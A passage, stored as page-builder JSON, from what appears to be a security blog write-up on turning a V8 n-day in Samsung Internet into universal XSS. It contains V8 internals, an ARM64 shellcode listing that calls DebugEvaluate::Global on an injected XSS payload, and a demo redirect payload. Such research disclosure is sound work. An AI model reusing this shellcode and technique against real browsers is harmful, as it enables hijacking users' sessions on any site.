Compiler::GetFunctionFromValidatedString(\n direct_handle(target->native_context(), isolate), source,\n NO_PARSE_RESTRICTION, kNoSourcePosition));\n RETURN_RESULT_OR_FAILURE(\n isolate, Execution::Call(isolate, function, target_global_proxy, {}));\n",[147454],{"type":24,"tag":145,"props":147455,"children":147456},{"__ignoreMap":7},[147457,147468,147475,147482,147489,147497,147509,147517,147534,147564,147572,147584],{"type":24,"tag":301,"props":147458,"children":147459},{"class":303,"line":304},[147460,147464],{"type":24,"tag":301,"props":147461,"children":147462},{"style":314},[147463],{"type":30,"value":147315},{"type":24,"tag":301,"props":147465,"children":147466},{"style":359},[147467],{"type":30,"value":147320},{"type":24,"tag":301,"props":147469,"children":147470},{"class":303,"line":320},[147471],{"type":24,"tag":301,"props":147472,"children":147473},{"emptyLinePlaceholder":16},[147474],{"type":30,"value":341},{"type":24,"tag":301,"props":147476,"children":147477},{"class":303,"line":335},[147478],{"type":24,"tag":301,"props":147479,"children":147480},{"style":359},[147481],{"type":30,"value":133836},{"type":24,"tag":301,"props":147483,"children":147484},{"class":303,"line":344},[147485],{"type":24,"tag":301,"props":147486,"children":147487},{"emptyLinePlaceholder":16},[147488],{"type":30,"value":341},{"type":24,"tag":301,"props":147490,"children":147491},{"class":303,"line":401},[147492],{"type":24,"tag":301,"props":147493,"children":147494},{"style":359},[147495],{"type":30,"value":147496}," DirectHandle\u003CJSFunction> function;\n",{"type":24,"tag":301,"props":147498,"children":147499},{"class":303,"line":415},[147500,147505],{"type":24,"tag":301,"props":147501,"children":147502},{"style":314},[147503],{"type":30,"value":147504}," ASSIGN_RETURN_FAILURE_ON_EXCEPTION",{"type":24,"tag":301,"props":147506,"children":147507},{"style":359},[147508],{"type":30,"value":1707},{"type":24,"tag":301,"props":147510,"children":147511},{"class":303,"line":439},[147512],{"type":24,"tag":301,"props":147513,"children":147514},{"style":359},[147515],{"type":30,"value":147516}," isolate, function,\n",{"type":24,"tag":301,"props":147518,"children":147519},{"class":303,"line":447},[147520,147525,147530],{"type":24,"tag":301,"props":147521,"children":147522},{"style":359},[147523],{"type":30,"value":147524}," Compiler::",{"type":24,"tag":301,"props":147526,"children":147527},{"style":314},[147528],{"type":30,"value":147529},"GetFunctionFromValidatedString",{"type":24,"tag":301,"props":147531,"children":147532},{"style":359},[147533],{"type":30,"value":1707},{"type":24,"tag":301,"props":147535,"children":147536},{"class":303,"line":476},[147537,147542,147546,147550,147554,147559],{"type":24,"tag":301,"props":147538,"children":147539},{"style":314},[147540],{"type":30,"value":147541}," direct_handle",{"type":24,"tag":301,"props":147543,"children":147544},{"style":359},[147545],{"type":30,"value":362},{"type":24,"tag":301,"props":147547,"children":147548},{"style":369},[147549],{"type":30,"value":121770},{"type":24,"tag":301,"props":147551,"children":147552},{"style":359},[147553],{"type":30,"value":882},{"type":24,"tag":301,"props":147555,"children":147556},{"style":314},[147557],{"type":30,"value":147558},"native_context",{"type":24,"tag":301,"props":147560,"children":147561},{"style":359},[147562],{"type":30,"value":147563},"(), isolate), source,\n",{"type":24,"tag":301,"props":147565,"children":147566},{"class":303,"line":495},[147567],{"type":24,"tag":301,"props":147568,"children":147569},{"style":359},[147570],{"type":30,"value":147571}," NO_PARSE_RESTRICTION, kNoSourcePosition));\n",{"type":24,"tag":301,"props":147573,"children":147574},{"class":303,"line":504},[147575,147580],{"type":24,"tag":301,"props":147576,"children":147577},{"style":314},[147578],{"type":30,"value":147579}," RETURN_RESULT_OR_FAILURE",{"type":24,"tag":301,"props":147581,"children":147582},{"style":359},[147583],{"type":30,"value":1707},{"type":24,"tag":301,"props":147585,"children":147586},{"class":303,"line":512},[147587,147592,147597],{"type":24,"tag":301,"props":147588,"children":147589},{"style":359},[147590],{"type":30,"value":147591}," isolate, Execution::",{"type":24,"tag":301,"props":147593,"children":147594},{"style":314},[147595],{"type":30,"value":147596},"Call",{"type":24,"tag":301,"props":147598,"children":147599},{"style":359},[147600],{"type":30,"value":147601},"(isolate, function, target_global_proxy, {}));\n",{"type":24,"tag":32,"props":147603,"children":147604},{},[147605,147607,147612,147614,147620,147622,147628,147630,147636],{"type":30,"value":147606},"But determining the correct ",{"type":24,"tag":145,"props":147608,"children":147610},{"className":147609},[],[147611],{"type":30,"value":121770},{"type":30,"value":147613}," value, obtaining ",{"type":24,"tag":145,"props":147615,"children":147617},{"className":147616},[],[147618],{"type":30,"value":147619},"target->native_context()",{"type":30,"value":147621},", and locating the ",{"type":24,"tag":145,"props":147623,"children":147625},{"className":147624},[],[147626],{"type":30,"value":147627},"direct_handle",{"type":30,"value":147629}," function, just to make a proper call to ",{"type":24,"tag":145,"props":147631,"children":147633},{"className":147632},[],[147634],{"type":30,"value":147635},"Compiler::GetFunctionFromValidatedString",{"type":30,"value":147637},", seemed unnecessarily cumbersome.",{"type":24,"tag":32,"props":147639,"children":147640},{},[147641,147643,147649],{"type":30,"value":147642},"Instead, we found a much simpler option with no security checks: ",{"type":24,"tag":145,"props":147644,"children":147646},{"className":147645},[],[147647],{"type":30,"value":147648},"DebugEvaluate::Global",{"type":30,"value":147650},". This function is used by the DevTools console to evaluate JavaScript entered there.",{"type":24,"tag":32,"props":147652,"children":147653},{},[147654],{"type":30,"value":147655},"For our needs, it is straightforward to call:",{"type":24,"tag":291,"props":147657,"children":147659},{"code":147658,"language":35868,"meta":7,"className":35866,"style":7},"MaybeDirectHandle\u003CObject> DebugEvaluate::Global(Isolate* isolate,\n Handle\u003CString> source,\n debug::EvaluateGlobalMode mode,\n REPLMode repl_mode);\n",[147660],{"type":24,"tag":145,"props":147661,"children":147662},{"__ignoreMap":7},[147663,147711,147739,147760],{"type":24,"tag":301,"props":147664,"children":147665},{"class":303,"line":304},[147666,147671,147675,147679,147684,147689,147693,147698,147702,147707],{"type":24,"tag":301,"props":147667,"children":147668},{"style":10246},[147669],{"type":30,"value":147670},"MaybeDirectHandle",{"type":24,"tag":301,"props":147672,"children":147673},{"style":359},[147674],{"type":30,"value":1849},{"type":24,"tag":301,"props":147676,"children":147677},{"style":10246},[147678],{"type":30,"value":55585},{"type":24,"tag":301,"props":147680,"children":147681},{"style":359},[147682],{"type":30,"value":147683},"> DebugEvaluate::",{"type":24,"tag":301,"props":147685,"children":147686},{"style":314},[147687],{"type":30,"value":147688},"Global",{"type":24,"tag":301,"props":147690,"children":147691},{"style":359},[147692],{"type":30,"value":362},{"type":24,"tag":301,"props":147694,"children":147695},{"style":10246},[147696],{"type":30,"value":147697},"Isolate",{"type":24,"tag":301,"props":147699,"children":147700},{"style":348},[147701],{"type":30,"value":772},{"type":24,"tag":301,"props":147703,"children":147704},{"style":369},[147705],{"type":30,"value":147706}," isolate",{"type":24,"tag":301,"props":147708,"children":147709},{"style":359},[147710],{"type":30,"value":1729},{"type":24,"tag":301,"props":147712,"children":147713},{"class":303,"line":320},[147714,147719,147723,147727,147731,147735],{"type":24,"tag":301,"props":147715,"children":147716},{"style":10246},[147717],{"type":30,"value":147718}," Handle",{"type":24,"tag":301,"props":147720,"children":147721},{"style":359},[147722],{"type":30,"value":1849},{"type":24,"tag":301,"props":147724,"children":147725},{"style":10246},[147726],{"type":30,"value":54662},{"type":24,"tag":301,"props":147728,"children":147729},{"style":359},[147730],{"type":30,"value":12641},{"type":24,"tag":301,"props":147732,"children":147733},{"style":369},[147734],{"type":30,"value":9643},{"type":24,"tag":301,"props":147736,"children":147737},{"style":359},[147738],{"type":30,"value":1729},{"type":24,"tag":301,"props":147740,"children":147741},{"class":303,"line":335},[147742,147747,147752,147756],{"type":24,"tag":301,"props":147743,"children":147744},{"style":359},[147745],{"type":30,"value":147746}," debug::",{"type":24,"tag":301,"props":147748,"children":147749},{"style":10246},[147750],{"type":30,"value":147751},"EvaluateGlobalMode",{"type":24,"tag":301,"props":147753,"children":147754},{"style":369},[147755],{"type":30,"value":112968},{"type":24,"tag":301,"props":147757,"children":147758},{"style":359},[147759],{"type":30,"value":1729},{"type":24,"tag":301,"props":147761,"children":147762},{"class":303,"line":344},[147763,147768,147773],{"type":24,"tag":301,"props":147764,"children":147765},{"style":10246},[147766],{"type":30,"value":147767}," REPLMode",{"type":24,"tag":301,"props":147769,"children":147770},{"style":369},[147771],{"type":30,"value":147772}," repl_mode",{"type":24,"tag":301,"props":147774,"children":147775},{"style":359},[147776],{"type":30,"value":589},{"type":24,"tag":32,"props":147778,"children":147779},{},[147780,147782,147787,147789,147794,147796,147801,147803,147809,147810,147816],{"type":30,"value":147781},"We must supply the ",{"type":24,"tag":145,"props":147783,"children":147785},{"className":147784},[],[147786],{"type":30,"value":147356},{"type":30,"value":147788}," pointer, a ",{"type":24,"tag":145,"props":147790,"children":147792},{"className":147791},[],[147793],{"type":30,"value":54662},{"type":30,"value":147795}," object containing our XSS payload as ",{"type":24,"tag":145,"props":147797,"children":147799},{"className":147798},[],[147800],{"type":30,"value":9643},{"type":30,"value":147802},", and the ",{"type":24,"tag":145,"props":147804,"children":147806},{"className":147805},[],[147807],{"type":30,"value":147808},"mode",{"type":30,"value":2378},{"type":24,"tag":145,"props":147811,"children":147813},{"className":147812},[],[147814],{"type":30,"value":147815},"repl_mode",{"type":30,"value":147817}," values, which are simple enum literals.",{"type":24,"tag":32,"props":147819,"children":147820},{},[147821,147823,147828,147830,147836,147838,147843,147845,147850,147852,147858,147860,147866,147868,147873,147875,147880,147882,147887,147889,147894],{"type":30,"value":147822},"To obtain the ",{"type":24,"tag":145,"props":147824,"children":147826},{"className":147825},[],[147827],{"type":30,"value":147356},{"type":30,"value":147829}," pointer within our shellcode, we call ",{"type":24,"tag":145,"props":147831,"children":147833},{"className":147832},[],[147834],{"type":30,"value":147835},"Isolate::TryGetCurrent()",{"type":30,"value":147837},", which returns the current ",{"type":24,"tag":145,"props":147839,"children":147841},{"className":147840},[],[147842],{"type":30,"value":147356},{"type":30,"value":147844},". To construct a valid ",{"type":24,"tag":145,"props":147846,"children":147848},{"className":147847},[],[147849],{"type":30,"value":54662},{"type":30,"value":147851}," object holding our payload, we call ",{"type":24,"tag":145,"props":147853,"children":147855},{"className":147854},[],[147856],{"type":30,"value":147857},"v8::String::NewFromUTF8",{"type":30,"value":147859},". This ",{"type":24,"tag":145,"props":147861,"children":147863},{"className":147862},[],[147864],{"type":30,"value":147865},"NewFromUTF8",{"type":30,"value":147867}," function takes four arguments: the ",{"type":24,"tag":145,"props":147869,"children":147871},{"className":147870},[],[147872],{"type":30,"value":147356},{"type":30,"value":147874},", the string bytes as ",{"type":24,"tag":145,"props":147876,"children":147878},{"className":147877},[],[147879],{"type":30,"value":10528},{"type":30,"value":147881},", an enum literal specifying the string type, and ",{"type":24,"tag":145,"props":147883,"children":147885},{"className":147884},[],[147886],{"type":30,"value":15318},{"type":30,"value":147888},", which is the size of the ",{"type":24,"tag":145,"props":147890,"children":147892},{"className":147891},[],[147893],{"type":30,"value":10528},{"type":30,"value":23944},{"type":24,"tag":32,"props":147896,"children":147897},{},[147898],{"type":30,"value":147899},"The resulting shellcode that executes our XSS payload looks like this:",{"type":24,"tag":291,"props":147901,"children":147903},{"code":147902,"language":146192,"meta":7,"className":146193,"style":7},"// get isolate ptr, v8::Isolate::TryGetCurrent(0x9ba3bd0)\nmovz x1, #0xf7a0\nmovk x1, #0x0071, lsl #16\nadd x9, x12, x1\nmovz x1, #0x5ac8\nmovk x1, #0x054f, lsl #16\nadd x0, x12, x1\nblr x9\n// *x0 is isolate pointer\n// store isolate ptr to stack\nldr x13, [x0]\nstr x13, [sp, #-16]!\n\n// store x10 = v8::String::NewFromUTF8\nmovz x1, #0x1140\nmovk x1, #0x0242, lsl #16\nsub x10, x12, x1\n\n// mmap a RW page for our xss payload\nmov x0, #0\nmov x1, #{page_align(len(XSS_PAYLOAD))}\nmov x2, #3\nmov x3, #34\nmov x4, #-1\nmov x5, #0\nmov x8, #222\nsvc #0\n\n// write our xss payload to mmapped rw page\n{write_str(XSS_PAYLOAD, \"x0\")}\n\n// store x11 = XSS_PAYLOAD string\nmov x11, x0\n\n// pop back isolate pointer\nldr x13, [sp], #16\n\n// at this point:\n// x13 = isolate *\n// x11 = XSS_PAYLOAD string mmapped region\n// x10 = v8::String::NewFromUtf8\n\n// call v8::String::NewFromUTF8 with our xss_payload\n// arg0 = isolate *\nmov x0, x13\n// arg1 = char *c_str\nmov x1, x11\n// arg2 = type = kNormal\nmov x2, #0\n// arg4 = length\nmov w3, #{len(XSS_PAYLOAD)}\n// call NewFromUTF8\nblr x10\n\n// store x14 = String XSS_PAYLOAD\nmov x14, x0\n\n// store x9 = v8::internal::DebugEvaluate::Global\nmovz x1, #0xe44c\nmovk x1, #0x014e, lsl #16\nsub x9, x12, x1\n\n// call v8::internal::DebugEvaluate::Global\n// arg0 = isolate *\nmov x0, x13\n// arg1 = String *source\nmov x1, x14\n// arg2 = mode = kDefault\nmov x2, #0\n// arg3 = repl_mode = kYes\nmov x3, #0\n\nblr x9\n",[147904],{"type":24,"tag":145,"props":147905,"children":147906},{"__ignoreMap":7},[147907,147915,147923,147931,147939,147947,147955,147963,147971,147979,147987,147995,148003,148010,148018,148026,148034,148042,148049,148057,148064,148072,148080,148087,148094,148101,148108,148115,148122,148130,148138,148145,148153,148161,148168,148176,148184,148191,148198,148206,148214,148222,148229,148237,148245,148253,148261,148269,148277,148285,148293,148301,148309,148317,148324,148332,148340,148347,148355,148363,148371,148379,148386,148394,148401,148408,148416,148424,148432,148440,148449,148458,148466],{"type":24,"tag":301,"props":147908,"children":147909},{"class":303,"line":304},[147910],{"type":24,"tag":301,"props":147911,"children":147912},{},[147913],{"type":30,"value":147914},"// get isolate ptr, v8::Isolate::TryGetCurrent(0x9ba3bd0)\n",{"type":24,"tag":301,"props":147916,"children":147917},{"class":303,"line":320},[147918],{"type":24,"tag":301,"props":147919,"children":147920},{},[147921],{"type":30,"value":147922},"movz x1, #0xf7a0\n",{"type":24,"tag":301,"props":147924,"children":147925},{"class":303,"line":335},[147926],{"type":24,"tag":301,"props":147927,"children":147928},{},[147929],{"type":30,"value":147930},"movk x1, #0x0071, lsl #16\n",{"type":24,"tag":301,"props":147932,"children":147933},{"class":303,"line":344},[147934],{"type":24,"tag":301,"props":147935,"children":147936},{},[147937],{"type":30,"value":147938},"add x9, x12, x1\n",{"type":24,"tag":301,"props":147940,"children":147941},{"class":303,"line":401},[147942],{"type":24,"tag":301,"props":147943,"children":147944},{},[147945],{"type":30,"value":147946},"movz x1, #0x5ac8\n",{"type":24,"tag":301,"props":147948,"children":147949},{"class":303,"line":415},[147950],{"type":24,"tag":301,"props":147951,"children":147952},{},[147953],{"type":30,"value":147954},"movk x1, #0x054f, lsl #16\n",{"type":24,"tag":301,"props":147956,"children":147957},{"class":303,"line":439},[147958],{"type":24,"tag":301,"props":147959,"children":147960},{},[147961],{"type":30,"value":147962},"add x0, x12, x1\n",{"type":24,"tag":301,"props":147964,"children":147965},{"class":303,"line":447},[147966],{"type":24,"tag":301,"props":147967,"children":147968},{},[147969],{"type":30,"value":147970},"blr x9\n",{"type":24,"tag":301,"props":147972,"children":147973},{"class":303,"line":476},[147974],{"type":24,"tag":301,"props":147975,"children":147976},{},[147977],{"type":30,"value":147978},"// *x0 is isolate pointer\n",{"type":24,"tag":301,"props":147980,"children":147981},{"class":303,"line":495},[147982],{"type":24,"tag":301,"props":147983,"children":147984},{},[147985],{"type":30,"value":147986},"// store isolate ptr to stack\n",{"type":24,"tag":301,"props":147988,"children":147989},{"class":303,"line":504},[147990],{"type":24,"tag":301,"props":147991,"children":147992},{},[147993],{"type":30,"value":147994},"ldr x13, [x0]\n",{"type":24,"tag":301,"props":147996,"children":147997},{"class":303,"line":512},[147998],{"type":24,"tag":301,"props":147999,"children":148000},{},[148001],{"type":30,"value":148002},"str x13, [sp, #-16]!\n",{"type":24,"tag":301,"props":148004,"children":148005},{"class":303,"line":592},[148006],{"type":24,"tag":301,"props":148007,"children":148008},{"emptyLinePlaceholder":16},[148009],{"type":30,"value":341},{"type":24,"tag":301,"props":148011,"children":148012},{"class":303,"line":619},[148013],{"type":24,"tag":301,"props":148014,"children":148015},{},[148016],{"type":30,"value":148017},"// store x10 = v8::String::NewFromUTF8\n",{"type":24,"tag":301,"props":148019,"children":148020},{"class":303,"line":635},[148021],{"type":24,"tag":301,"props":148022,"children":148023},{},[148024],{"type":30,"value":148025},"movz x1, #0x1140\n",{"type":24,"tag":301,"props":148027,"children":148028},{"class":303,"line":643},[148029],{"type":24,"tag":301,"props":148030,"children":148031},{},[148032],{"type":30,"value":148033},"movk x1, #0x0242, lsl #16\n",{"type":24,"tag":301,"props":148035,"children":148036},{"class":303,"line":652},[148037],{"type":24,"tag":301,"props":148038,"children":148039},{},[148040],{"type":30,"value":148041},"sub x10, x12, x1\n",{"type":24,"tag":301,"props":148043,"children":148044},{"class":303,"line":666},[148045],{"type":24,"tag":301,"props":148046,"children":148047},{"emptyLinePlaceholder":16},[148048],{"type":30,"value":341},{"type":24,"tag":301,"props":148050,"children":148051},{"class":303,"line":674},[148052],{"type":24,"tag":301,"props":148053,"children":148054},{},[148055],{"type":30,"value":148056},"// mmap a RW page for our xss payload\n",{"type":24,"tag":301,"props":148058,"children":148059},{"class":303,"line":692},[148060],{"type":24,"tag":301,"props":148061,"children":148062},{},[148063],{"type":30,"value":146408},{"type":24,"tag":301,"props":148065,"children":148066},{"class":303,"line":3631},[148067],{"type":24,"tag":301,"props":148068,"children":148069},{},[148070],{"type":30,"value":148071},"mov x1, #{page_align(len(XSS_PAYLOAD))}\n",{"type":24,"tag":301,"props":148073,"children":148074},{"class":303,"line":3639},[148075],{"type":24,"tag":301,"props":148076,"children":148077},{},[148078],{"type":30,"value":148079},"mov x2, #3\n",{"type":24,"tag":301,"props":148081,"children":148082},{"class":303,"line":3647},[148083],{"type":24,"tag":301,"props":148084,"children":148085},{},[148086],{"type":30,"value":146431},{"type":24,"tag":301,"props":148088,"children":148089},{"class":303,"line":3685},[148090],{"type":24,"tag":301,"props":148091,"children":148092},{},[148093],{"type":30,"value":146439},{"type":24,"tag":301,"props":148095,"children":148096},{"class":303,"line":3713},[148097],{"type":24,"tag":301,"props":148098,"children":148099},{},[148100],{"type":30,"value":146447},{"type":24,"tag":301,"props":148102,"children":148103},{"class":303,"line":3721},[148104],{"type":24,"tag":301,"props":148105,"children":148106},{},[148107],{"type":30,"value":146455},{"type":24,"tag":301,"props":148109,"children":148110},{"class":303,"line":3751},[148111],{"type":24,"tag":301,"props":148112,"children":148113},{},[148114],{"type":30,"value":146370},{"type":24,"tag":301,"props":148116,"children":148117},{"class":303,"line":3782},[148118],{"type":24,"tag":301,"props":148119,"children":148120},{"emptyLinePlaceholder":16},[148121],{"type":30,"value":341},{"type":24,"tag":301,"props":148123,"children":148124},{"class":303,"line":3791},[148125],{"type":24,"tag":301,"props":148126,"children":148127},{},[148128],{"type":30,"value":148129},"// write our xss payload to mmapped rw page\n",{"type":24,"tag":301,"props":148131,"children":148132},{"class":303,"line":3819},[148133],{"type":24,"tag":301,"props":148134,"children":148135},{},[148136],{"type":30,"value":148137},"{write_str(XSS_PAYLOAD, \"x0\")}\n",{"type":24,"tag":301,"props":148139,"children":148140},{"class":303,"line":4397},[148141],{"type":24,"tag":301,"props":148142,"children":148143},{"emptyLinePlaceholder":16},[148144],{"type":30,"value":341},{"type":24,"tag":301,"props":148146,"children":148147},{"class":303,"line":4405},[148148],{"type":24,"tag":301,"props":148149,"children":148150},{},[148151],{"type":30,"value":148152},"// store x11 = XSS_PAYLOAD string\n",{"type":24,"tag":301,"props":148154,"children":148155},{"class":303,"line":4422},[148156],{"type":24,"tag":301,"props":148157,"children":148158},{},[148159],{"type":30,"value":148160},"mov x11, x0\n",{"type":24,"tag":301,"props":148162,"children":148163},{"class":303,"line":4438},[148164],{"type":24,"tag":301,"props":148165,"children":148166},{"emptyLinePlaceholder":16},[148167],{"type":30,"value":341},{"type":24,"tag":301,"props":148169,"children":148170},{"class":303,"line":4446},[148171],{"type":24,"tag":301,"props":148172,"children":148173},{},[148174],{"type":30,"value":148175},"// pop back isolate pointer\n",{"type":24,"tag":301,"props":148177,"children":148178},{"class":303,"line":4506},[148179],{"type":24,"tag":301,"props":148180,"children":148181},{},[148182],{"type":30,"value":148183},"ldr x13, [sp], #16\n",{"type":24,"tag":301,"props":148185,"children":148186},{"class":303,"line":4566},[148187],{"type":24,"tag":301,"props":148188,"children":148189},{"emptyLinePlaceholder":16},[148190],{"type":30,"value":341},{"type":24,"tag":301,"props":148192,"children":148193},{"class":303,"line":4574},[148194],{"type":24,"tag":301,"props":148195,"children":148196},{},[148197],{"type":30,"value":146491},{"type":24,"tag":301,"props":148199,"children":148200},{"class":303,"line":4590},[148201],{"type":24,"tag":301,"props":148202,"children":148203},{},[148204],{"type":30,"value":148205},"// x13 = isolate *\n",{"type":24,"tag":301,"props":148207,"children":148208},{"class":303,"line":4599},[148209],{"type":24,"tag":301,"props":148210,"children":148211},{},[148212],{"type":30,"value":148213},"// x11 = XSS_PAYLOAD string mmapped region\n",{"type":24,"tag":301,"props":148215,"children":148216},{"class":303,"line":4629},[148217],{"type":24,"tag":301,"props":148218,"children":148219},{},[148220],{"type":30,"value":148221},"// x10 = v8::String::NewFromUtf8\n",{"type":24,"tag":301,"props":148223,"children":148224},{"class":303,"line":4659},[148225],{"type":24,"tag":301,"props":148226,"children":148227},{"emptyLinePlaceholder":16},[148228],{"type":30,"value":341},{"type":24,"tag":301,"props":148230,"children":148231},{"class":303,"line":4668},[148232],{"type":24,"tag":301,"props":148233,"children":148234},{},[148235],{"type":30,"value":148236},"// call v8::String::NewFromUTF8 with our xss_payload\n",{"type":24,"tag":301,"props":148238,"children":148239},{"class":303,"line":4677},[148240],{"type":24,"tag":301,"props":148241,"children":148242},{},[148243],{"type":30,"value":148244},"// arg0 = isolate *\n",{"type":24,"tag":301,"props":148246,"children":148247},{"class":303,"line":4697},[148248],{"type":24,"tag":301,"props":148249,"children":148250},{},[148251],{"type":30,"value":148252},"mov x0, x13\n",{"type":24,"tag":301,"props":148254,"children":148255},{"class":303,"line":4725},[148256],{"type":24,"tag":301,"props":148257,"children":148258},{},[148259],{"type":30,"value":148260},"// arg1 = char *c_str\n",{"type":24,"tag":301,"props":148262,"children":148263},{"class":303,"line":4733},[148264],{"type":24,"tag":301,"props":148265,"children":148266},{},[148267],{"type":30,"value":148268},"mov x1, x11\n",{"type":24,"tag":301,"props":148270,"children":148271},{"class":303,"line":4741},[148272],{"type":24,"tag":301,"props":148273,"children":148274},{},[148275],{"type":30,"value":148276},"// arg2 = type = kNormal\n",{"type":24,"tag":301,"props":148278,"children":148279},{"class":303,"line":4757},[148280],{"type":24,"tag":301,"props":148281,"children":148282},{},[148283],{"type":30,"value":148284},"mov x2, #0\n",{"type":24,"tag":301,"props":148286,"children":148287},{"class":303,"line":4765},[148288],{"type":24,"tag":301,"props":148289,"children":148290},{},[148291],{"type":30,"value":148292},"// arg4 = length\n",{"type":24,"tag":301,"props":148294,"children":148295},{"class":303,"line":4773},[148296],{"type":24,"tag":301,"props":148297,"children":148298},{},[148299],{"type":30,"value":148300},"mov w3, #{len(XSS_PAYLOAD)}\n",{"type":24,"tag":301,"props":148302,"children":148303},{"class":303,"line":4781},[148304],{"type":24,"tag":301,"props":148305,"children":148306},{},[148307],{"type":30,"value":148308},"// call NewFromUTF8\n",{"type":24,"tag":301,"props":148310,"children":148311},{"class":303,"line":4789},[148312],{"type":24,"tag":301,"props":148313,"children":148314},{},[148315],{"type":30,"value":148316},"blr x10\n",{"type":24,"tag":301,"props":148318,"children":148319},{"class":303,"line":4848},[148320],{"type":24,"tag":301,"props":148321,"children":148322},{"emptyLinePlaceholder":16},[148323],{"type":30,"value":341},{"type":24,"tag":301,"props":148325,"children":148326},{"class":303,"line":4862},[148327],{"type":24,"tag":301,"props":148328,"children":148329},{},[148330],{"type":30,"value":148331},"// store x14 = String XSS_PAYLOAD\n",{"type":24,"tag":301,"props":148333,"children":148334},{"class":303,"line":4871},[148335],{"type":24,"tag":301,"props":148336,"children":148337},{},[148338],{"type":30,"value":148339},"mov x14, x0\n",{"type":24,"tag":301,"props":148341,"children":148342},{"class":303,"line":4879},[148343],{"type":24,"tag":301,"props":148344,"children":148345},{"emptyLinePlaceholder":16},[148346],{"type":30,"value":341},{"type":24,"tag":301,"props":148348,"children":148349},{"class":303,"line":4942},[148350],{"type":24,"tag":301,"props":148351,"children":148352},{},[148353],{"type":30,"value":148354},"// store x9 = v8::internal::DebugEvaluate::Global\n",{"type":24,"tag":301,"props":148356,"children":148357},{"class":303,"line":4955},[148358],{"type":24,"tag":301,"props":148359,"children":148360},{},[148361],{"type":30,"value":148362},"movz x1, #0xe44c\n",{"type":24,"tag":301,"props":148364,"children":148365},{"class":303,"line":94926},[148366],{"type":24,"tag":301,"props":148367,"children":148368},{},[148369],{"type":30,"value":148370},"movk x1, #0x014e, lsl #16\n",{"type":24,"tag":301,"props":148372,"children":148373},{"class":303,"line":94934},[148374],{"type":24,"tag":301,"props":148375,"children":148376},{},[148377],{"type":30,"value":148378},"sub x9, x12, x1\n",{"type":24,"tag":301,"props":148380,"children":148381},{"class":303,"line":108273},[148382],{"type":24,"tag":301,"props":148383,"children":148384},{"emptyLinePlaceholder":16},[148385],{"type":30,"value":341},{"type":24,"tag":301,"props":148387,"children":148388},{"class":303,"line":108281},[148389],{"type":24,"tag":301,"props":148390,"children":148391},{},[148392],{"type":30,"value":148393},"// call v8::internal::DebugEvaluate::Global\n",{"type":24,"tag":301,"props":148395,"children":148396},{"class":303,"line":108289},[148397],{"type":24,"tag":301,"props":148398,"children":148399},{},[148400],{"type":30,"value":148244},{"type":24,"tag":301,"props":148402,"children":148403},{"class":303,"line":108297},[148404],{"type":24,"tag":301,"props":148405,"children":148406},{},[148407],{"type":30,"value":148252},{"type":24,"tag":301,"props":148409,"children":148410},{"class":303,"line":108325},[148411],{"type":24,"tag":301,"props":148412,"children":148413},{},[148414],{"type":30,"value":148415},"// arg1 = String *source\n",{"type":24,"tag":301,"props":148417,"children":148418},{"class":303,"line":111094},[148419],{"type":24,"tag":301,"props":148420,"children":148421},{},[148422],{"type":30,"value":148423},"mov x1, x14\n",{"type":24,"tag":301,"props":148425,"children":148426},{"class":303,"line":111102},[148427],{"type":24,"tag":301,"props":148428,"children":148429},{},[148430],{"type":30,"value":148431},"// arg2 = mode = kDefault\n",{"type":24,"tag":301,"props":148433,"children":148435},{"class":303,"line":148434},69,[148436],{"type":24,"tag":301,"props":148437,"children":148438},{},[148439],{"type":30,"value":148284},{"type":24,"tag":301,"props":148441,"children":148443},{"class":303,"line":148442},70,[148444],{"type":24,"tag":301,"props":148445,"children":148446},{},[148447],{"type":30,"value":148448},"// arg3 = repl_mode = kYes\n",{"type":24,"tag":301,"props":148450,"children":148452},{"class":303,"line":148451},71,[148453],{"type":24,"tag":301,"props":148454,"children":148455},{},[148456],{"type":30,"value":148457},"mov x3, #0\n",{"type":24,"tag":301,"props":148459,"children":148461},{"class":303,"line":148460},72,[148462],{"type":24,"tag":301,"props":148463,"children":148464},{"emptyLinePlaceholder":16},[148465],{"type":30,"value":341},{"type":24,"tag":301,"props":148467,"children":148469},{"class":303,"line":148468},73,[148470],{"type":24,"tag":301,"props":148471,"children":148472},{},[148473],{"type":30,"value":147970},{"type":24,"tag":80,"props":148475,"children":148477},{"id":148476},"uxss-demo",[148478],{"type":30,"value":148479},"UXSS Demo",{"type":24,"tag":32,"props":148481,"children":148482},{},[148483,148485,148491],{"type":30,"value":148484},"Below is a demo that executes the following UXSS payload: ",{"type":24,"tag":145,"props":148486,"children":148488},{"className":148487},[],[148489],{"type":30,"value":148490},"alert(document.domain); window.location.href = \"https://cor.team/\";",{"type":30,"value":206},{"type":24,"tag":9634,"props":148493,"children":148495},{"className":148494,"controls":16},[9637],[148496,148497,148501],{"type":30,"value":9641},{"type":24,"tag":9643,"props":148498,"children":148500},{"src":148499,"type":9646},"/posts/mobile-renderer-rce/demo.mp4",[],{"type":30,"value":9649},{"type":24,"tag":43,"props":148503,"children":148504},{"id":9652},[148505],{"type":30,"value":9655},{"type":24,"tag":32,"props":148507,"children":148508},{},[148509],{"type":30,"value":148510},"Given the complex nature of the modern software ecosystem, it is unsurprising to find core out of date libraries in popular applications. Samsung Internet relied on a six month old version of V8, a JavaScript engine where researchers frequently discover new vulnerabilities, providing us a large window for n-day exploitation.",{"type":24,"tag":32,"props":148512,"children":148513},{},[148514],{"type":30,"value":148515},"While renderer bugs are usually chained with another exploit such as a sandbox escape, we pushed the capabilities of the bug by targeting the weaker Site Isolation mechanism on mobile. As most web pages ran under the same process, we could inject shellcode into the JavaScript interpreter to achieve universal XSS in Samsung Internet browser.",{"type":24,"tag":9672,"props":148517,"children":148518},{},[148519],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":148521},[148522,148526,148529,148539],{"id":35771,"depth":320,"text":35774,"children":148523},[148524,148525],{"id":138667,"depth":335,"text":138670},{"id":138749,"depth":335,"text":138752},{"id":138782,"depth":320,"text":138785,"children":148527},[148528],{"id":138923,"depth":335,"text":138777},{"id":139067,"depth":320,"text":139070,"children":148530},[148531,148532,148533,148534,148535,148536,148537,148538],{"id":139073,"depth":335,"text":139076},{"id":139530,"depth":335,"text":139533},{"id":139712,"depth":335,"text":139715},{"id":139823,"depth":335,"text":139826},{"id":140099,"depth":335,"text":140102},{"id":142808,"depth":335,"text":142811},{"id":146089,"depth":335,"text":146092},{"id":148476,"depth":335,"text":148479},{"id":9652,"depth":320,"text":9655},"content:blog:2026-04-01-patch-gap-to-mobile-renderer-rce.md","blog/2026-04-01-patch-gap-to-mobile-renderer-rce.md","blog/2026-04-01-patch-gap-to-mobile-renderer-rce",{"_path":148544,"_dir":5,"_d